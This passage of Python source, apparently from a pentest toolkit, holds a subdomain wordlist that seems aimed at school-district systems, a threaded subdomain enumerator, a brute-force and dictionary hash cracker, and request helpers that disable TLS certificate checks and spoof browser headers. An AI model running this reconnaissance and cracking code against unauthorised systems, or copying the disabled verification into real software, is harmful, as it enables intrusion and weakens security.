enlearn","renplace","reporter","reportmax","request","res","reset","reveal","rise","roatws1","rock","rocket","rollcall","router","rp","rpad","rsapi","rta-app-a","rta-app-b","rvchs","s","safari","safariaves","sav4","sav5","sav6","school","schoolboard","schoolmax","schools","scim","score","scripting","scs","scsinfnow","scsmail","scsnxgnsvc","sdp","search","searchsoft","searchsoftauth","secure","securelink","security","securityportal","sedna","selawik","selmast","services","ses","sesmoodle","sets","setshome","setsser","setsti","setsweb","sftp","sftp2","sfw","shelbyed","shh","showcase","shssec","shungnak","sif","silverthrone","sis","siteproxy","sites","sjhs","skk","slingluff","slomanprimary","smk","sms","smtp","smtp-1","smtp1","smtp11","smtp2","sonicwallva","sophos","spam","spam2","spamtitan1","spamtitan2","spc","specialty","speedtest","sports","sresmoodle","sso","sspr","ssrpm","staff","staffportal","staffsurvey","status","sti","stidistrict","stisets","stisetsweb","striplin","sts","studentportal","studentvue","subfinder","subportal","sumter","support","supportportal","sva","swinstall","synergy","synergypsv","synergyweb","synldap","sysaid","szmcg","talk","tarrant","tbcparent","tcchsmoodle","tcm","tcs-docs","tcsd-ns-01","tcsd-ns-02","tcsdns","tcsfirewall","tcsscobia","teacherportal","teaching","technology","techweb","techwiki","temp","temptrak","tes","test","test5","testps","thompson","ths","tickets","timeclock","tla","tm","tools","trans","transelog","transportation","trend","triptracker","tserver","ttc-smb","ttc-spam","turn","tuscumbia","twa","tyler","tylerweb","ubnt","uc-exe","uc-exe-2","ugms","uisp","unifi","uniongrove","unk","updates","utm","view","view1","view2","visions","voip-expressway-e","vpec01","vpn","vpn-brw","waa","walnutpark","wanutil","wayfinder","wb","wbb","wboesfb","web","web2","webapps","webcentral","webcrd","webdisk","webmail","webmail2","websets","wes","wesmoodle","wessec","whsmoodle","wiki","wilcox","williamblount","windows-vs","winfield","workorder","workorders","wpes","www","www1","www2","wx","zendto"]
    
    kiwi_thread_list = []
    thread_count = 0
    for host in hosts:
        if subnet:
            subdomains = [""]
        else:
            subdomains = random.sample(subdomains,len(subdomains))
        for _ in subdomains:
            if _ == "":
                dns_host = host
            else:
                dns_host = f"{_}.{host}"

            print(CYAN + dns_host)
            kiwi_thread = threading.Thread(target=kiwi_juice,args=(dns_host,delay,scripts,))
            kiwi_thread_list.append(kiwi_thread)
            kiwi_thread.start()
            thread_count += 1
            if thread_count % cores == 0:
                for my_thread in kiwi_thread_list:
                    my_thread.join()
                kiwi_thread_list = []

    for my_thread in kiwi_thread_list:
        my_thread.join()

    clear()
    hits = list(set(hits[:]))
    hits.sort()
    with open(f"{init_host.replace('/','[]')}.txt","a") as file:
        for hit in hits:
            file.write(f"{hit}\n")

    clear()
    print(CYAN + f"{len(hits)} results written to {init_host.replace('/','[]')}.txt")



import random

def return_user_agent():
    agent_list = ["Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0",
                  "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"]
    choose = random.randint(0, len(agent_list) - 1)
    return agent_list[choose]



import hashlib
import os
import re
import time
import urllib.parse
from itertools import *
from TheSilent.clear import clear
import TheSilent.kitten_crawler as kitten
import TheSilent.puppy_requests as puppy

CYAN = "\033[1;36m"

def panda(init_hash=None,brute=None,create=None,delay=0,dictionary=None,mask=None):
    print(CYAN + "")
    clear()
    words = []
    if brute != None:
        for _ in range(1,36):
            words = product("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()",repeat=_)
            print(CYAN + f"attempting to crack {init_hash} with brute force using length {_}")
            for word in words:
                new_word = "".join(word)
                if hashlib.md5(new_word.encode()).hexdigest() == init_hash:
                    clear()
                    return new_word

                if hashlib.sha1(new_word.encode()).hexdigest() == init_hash:
                    clear()
                    return new_word

                if hashlib.sha224(new_word.encode()).hexdigest() == init_hash:
                    clear()
                    return new_word

                if hashlib.sha256(new_word.encode()).hexdigest() == init_hash:
                    clear()
                    return new_word

                if hashlib.sha384(new_word.encode()).hexdigest() == init_hash:
                    clear()
                    return new_word

                if hashlib.sha512(new_word.encode()).hexdigest() == init_hash:
                    clear()
                    return new_word

                if hashlib.sha3_224(new_word.encode()).hexdigest() == init_hash:
                    clear()
                    return new_word

                if hashlib.sha3_256(new_word.encode()).hexdigest() == init_hash:
                    clear()
                    return new_word

                if hashlib.sha3_384(new_word.encode()).hexdigest() == init_hash:
                    clear()
                    return new_word

                if hashlib.sha3_512(new_word.encode()).hexdigest() == init_hash:
                    clear()
                    return new_word

    if create != None:
        create = create.rstrip("/")
        word_list = []
        hosts = kitten.kitten_crawler(create,delay)
        for host in hosts:
            print(f"checking {host}")
            time.sleep(delay)
            try:
                data = puppy.text(host)
            except:
                continue
            words = re.findall("\w{4,}",data)
            for word in words:
                word_list = list(set(word_list[:]))
                word_list.append(word)
        word_list = list(set(word_list[:]))
        word_list.sort()
        with open(urllib.parse.urlparse(create).netloc + ".txt","a") as file:
            for word in word_list:
                file.write(f"{word}\n")
        clear()
        return f"found {len(word_list)} unique words"

    if dictionary != None:
        print(CYAN + f"attempting to crack {init_hash} with dictionary")
        if os.path.isfile(dictionary):
            with open(dictionary,"r") as f:
                for _ in f:
                    words.append(_.replace("\n",""))

        if not os.path.isfile(dictionary):
            files = os.listdir(dictionary)
            for ff in files:
                with open(dictionary + "/" + ff,"rb") as f:
                    for _ in f:
                        words.append(_.decode(errors="ignore").replace("\n",""))

        for word in words:
            if hashlib.md5(word.encode()).hexdigest() == init_hash:
                return word

            if hashlib.sha1(word.encode()).hexdigest() == init_hash:
                return word

            if hashlib.sha224(word.encode()).hexdigest() == init_hash:
                return word

            if hashlib.sha256(word.encode()).hexdigest() == init_hash:
                return word

            if hashlib.sha384(word.encode()).hexdigest() == init_hash:
                return word

            if hashlib.sha512(word.encode()).hexdigest() == init_hash:
                return word

            if hashlib.sha3_224(word.encode()).hexdigest() == init_hash:
                return word

            if hashlib.sha3_256(word.encode()).hexdigest() == init_hash:
                return word

            if hashlib.sha3_384(word.encode()).hexdigest() == init_hash:
                return word

            if hashlib.sha3_512(word.encode()).hexdigest() == init_hash:
                return word

    if mask != None:
        for _ in range(1,36):
            words = product("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()",repeat=_)
            print(CYAN + f"attempting to crack {init_hash} with mask using length {_}")
            for word in words:
                new_word = "".join(word)
                new_word = mask + new_word
                if hashlib.md5(new_word.encode()).hexdigest() == init_hash:
                    clear()
                    return new_word

                if hashlib.sha1(new_word.encode()).hexdigest() == init_hash:
                    clear()
                    return new_word

                if hashlib.sha224(new_word.encode()).hexdigest() == init_hash:
                    clear()
                    return new_word

                if hashlib.sha256(new_word.encode()).hexdigest() == init_hash:
                    clear()
                    return new_word

                if hashlib.sha384(new_word.encode()).hexdigest() == init_hash:
                    clear()
                    return new_word

                if hashlib.sha512(new_word.encode()).hexdigest() == init_hash:
                    clear()
                    return new_word

                if hashlib.sha3_224(new_word.encode()).hexdigest() == init_hash:
                    clear()
                    return new_word

                if hashlib.sha3_256(new_word.encode()).hexdigest() == init_hash:
                    clear()
                    return new_word

                if hashlib.sha3_384(new_word.encode()).hexdigest() == init_hash:
                    clear()
                    return new_word

                if hashlib.sha3_512(new_word.encode()).hexdigest() == init_hash:
                    clear()
                    return new_word



import ssl
import urllib.parse
import urllib.request
from TheSilent.return_user_agent import *

verify = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
verify.check_hostname = False
verify.verify_mode = ssl.CERT_NONE

fake_headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
                "Accept-Language":"en-US,en;q=0.5",
                "User-Agent":return_user_agent(),
                "UPGRADE-INSECURE-REQUESTS":"1"}

def getheaders(host,method="GET",data=b"",headers=fake_headers,timeout=10):
    simple_request = urllib.request.Request(host,data=urllib.parse.urlencode(data).encode(),method=method,unverifiable=True)
    for _,__ in headers.items():
        simple_request.add_header(_,__)
    simple_response = urllib.request.urlopen(simple_request,timeout=timeout)
    return simple_response.headers

def text(host,method="GET",data=b"",headers=fake_headers,timeout=10,raw=False):
    simple_request = urllib.request.Request(host,data=urllib.parse.urlencode(data).encode(),method=method,unverifiable=True)
    for _,__ in headers.items():
        simple_request.add_header(_,__)
    simple_response = urllib.request.urlopen(simple_request,timeout=timeout)
    if raw:
        return simple_response.read()
    else:
        return simple_response.read().decode("ascii",errors="ignore")

def url(host,method="GET",data=b"",headers=fake_headers,timeout=10):
    simple_request = urllib.request.Request(host,data=urllib.parse.urlencode(data).encode(),method=method,unverifiable=True)
    for _,__ in headers.items():
        simple_request.add_header(_,__)
    simple_response = urllib.request.urlopen(simple_request,timeout=timeout)
    return simple_response.url
